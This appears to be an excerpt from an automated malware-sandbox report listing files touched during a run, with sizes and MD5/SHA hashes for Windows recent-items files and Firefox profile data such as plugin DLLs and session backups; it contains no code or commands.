Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
6.5MB
MD5438c3af1332297479ee9ed271bb7bf39
SHA1b3571e5e31d02b02e7d68806a254a4d290339af3
SHA256b45630be7b3c1c80551e0a89e7bd6dbc65804fa0ca99e5f13fb317b2083ac194
SHA512984d3b438146d1180b6c37d54793fadb383f4585e9a13f0ec695f75b27b50db72d7f5f0ef218a6313302829ba83778c348d37c4d9e811c0dba7c04ef4fb04672
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5dd51233f831ff7a94a66589bcc7fa867
SHA1d17ae5848007fd9ceb8af7ad734049901874b35c
SHA256725edb68f535a85ba88770ceabec38f1c53325954f94b4688b93c2a2b7123bf4
SHA5126e0cf4431741854fc3922ed4af13620d2cf6907dc8b70a313ab9351eb58f3828d035f46b556c9f8d852e372639c684d3226bb69b4b0382cf4b218424c37cfcc1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UQOJ5CPIP552B2CI54NV.temp
Filesize7KB
MD510a28b1cf4a1365307e372d67e8e4d8c
SHA1dc268d2c39522930e5ad39795bad23d839a43acc
SHA25602cd8fa8b01fddd92c1b943270b411a42fe21fd33664f46e0ade8be0fba963f4
SHA5122df0790eecdb0c3f6c6cee7d51a6b05169bf382db922162e432c7cfbe96285cfb75b7e5fd04f207d04284490c674a7c58d3846391f25646c144a47f6dbb0c2e4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD557c073066e8180d0bdb89e7630677d92
SHA1fbf04a9a7544d2c5ffb003f6cfd5515bcbec1978
SHA25680b4e59341862e5302dd256ba26d6783f3ed70a14630d2681a6cd5519d75792d
SHA51209056e49edfd83bcdea5cf349ad0eb4a90b66b140f49a60bf32fa8419827dcc4bc0cc759d853fa14c9a290cfa9ca620c68e69918f3ea02c3bcd1801a8f21e75a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5fd51542270f277663cda3ce03b779301
SHA1dc8506070fbbff5e21ef13ea8b244f293961e8cf
SHA2565e02af56cd4d6df00aa396d445b0cfebf7405731e1d61f74da152330aa545e3f
SHA5129ad19128989ee0c2c647c4e3a9841cd194d4b8d24077f1d4cf4d477ba8f106e481e9b0b9087cb3b931de568ed7ecc007a17895c26a1abd591b9b7571f15a8009
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\63a429ea-004a-40fe-8d9a-f847466b414c
Filesize12KB
MD5ebc844e262e7b82fe631d6d2991fd815
SHA1e2b87cec4a37db7f9db97e76ae5e966cd1543ec5
SHA2569937627d8bcfa7abb7417e5cb4349cba391680b7ee1abe464c7ee096d90f6806
SHA512ff2cf5992fd3cfa2b8a27b2620993fa06bdd6b8bb898460435907f260db9ea9432d92c5e6fd3a0a77e165d47f97d4d66d00fdc2ddda97ded422ed31a3496c67f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\ade25dec-6207-47e6-88c6-516e610cb790
Filesize745B
MD5af5b594e1e2b7af4e6748d4981e6521b
SHA1d632641daed9f7eff7eaad39727accb19611c2cd
SHA25668ace8d9437685e367f407266ff958cc3b45a40cd202cfdc937445294b55cfb2
SHA5123f321900777e9986070eed7859626ec058b656c5141c7e1c5ecb0fc27bb1cfca95bf68862cce5af2d7d1316019d37bde31a4bc49c161e409236590019f6eadf6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2449.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2449.0\manifest.json
Filesize372B
MD56981f969f95b2a983547050ab1cb2a20
SHA1e81c6606465b5aefcbef6637e205e9af51312ef5
SHA25613b46a6499f31975c9cc339274600481314f22d0af364b63eeddd2686f9ab665
SHA5129415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll
Filesize10.2MB
MD554dc5ae0659fabc263d83487ae1c03e4
SHA1c572526830da6a5a6478f54bc6edb178a4d641f4
SHA25643cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e
SHA5128e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig
Filesize1KB
MD5dea1586a0ebca332d265dc5eda3c1c19
SHA129e8a8962a3e934fd6a804f9f386173f1b2f9be4
SHA25698fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60
SHA5120e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6
-
Filesize
7KB
MD5113615dde26e63c2a29e17a13ab43f9d
SHA1364ea05433fe91d9c132a809f872fe021bf4ffa8
SHA25666edc15542f2bed6adf3645f10524002dcfb81c80b46b05dea73c90821fe87bb
SHA5123cf0518a49c2882f4576ac2ce5543053c4933d626a15986ca957cffc993b5d51535ee783dcc63a99ec52684ae18647a38d64d00b1db17bf8db23089b64294862
-
Filesize
6KB
MD55fecdf369007164dcb97faae7207c7ac
SHA1482f8ab19fc10cfe07caceea4a30265d70d6e8ca
SHA256dd3fbadc3a322f5ae1c8211e9320ab4c745dea23674e1cc9b54325a01c44c0f8
SHA512e469e6094610acce33b2d8c0a7ad5524bb1199bff8a9121b1903b38baaf91a913231cfa07e8477ad4dd60fc4f83761f89487f79f332ed58b08178e4172fa39c3
-
Filesize
6KB
MD5fc46d57a3f668d00a464bd8f7be30bb3
SHA1d73f53b272d2d7e271c4aae433c90b4d832e500c
SHA2564af396da091ec681bd0439f3474bd012766375449ec963092c5c7427ee94c42e
SHA512e8a1b844e2aef92a742978068c56f751aa29b61575967e83595c435796b0dc5822ce325bf75471e2f30a7f415942749838ae4d003eb09bf3b4a50ca3e0375a64
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5e63adf60fac5356fea6f9832e483a73b
SHA17e7d9c36df1fdc11e3504933338fc149637e63f4
SHA2561029946efd4628e2645bcbeae14581d4d389dd185f4825932ddb2d90f4fc521f
SHA512531444d4e9883fc031d61c9dcebd2735f726c1e9a15031845c45c6608b9142ee30520401f977c654b53f66f712302d79a1cc9f8a074c4e6f696d8d8677bc3f3f
-
Filesize
88KB
MD589ccc29850f1881f860e9fd846865cad
SHA1d781641be093f1ea8e3a44de0e8bcc60f3da27d0
SHA2564d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502